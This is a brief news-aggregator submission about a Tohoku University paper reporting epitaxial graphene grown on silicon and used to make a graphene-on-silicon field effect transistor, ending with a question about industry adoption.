eldavojohn writes "A new paper entitled Epitaxial Graphene on Silicon toward Graphene-Silicon Fusion Electronics published by a group of physicists at Tohoku University in Japan has demonstrated that they can grow graphene on a silicon substrate and pair that technique with conventional lithography to create a graphene-on-silicon field effect transistor. For quite sometime we've been discussing the supermaterial graphene being used like silicon improving everything from memory density to transistors. Given this demonstration, are we witnessing the start of a new era in electronics or are there more hurdles to clear before the manufacturers adopt this fabrication process and embrace graphene?"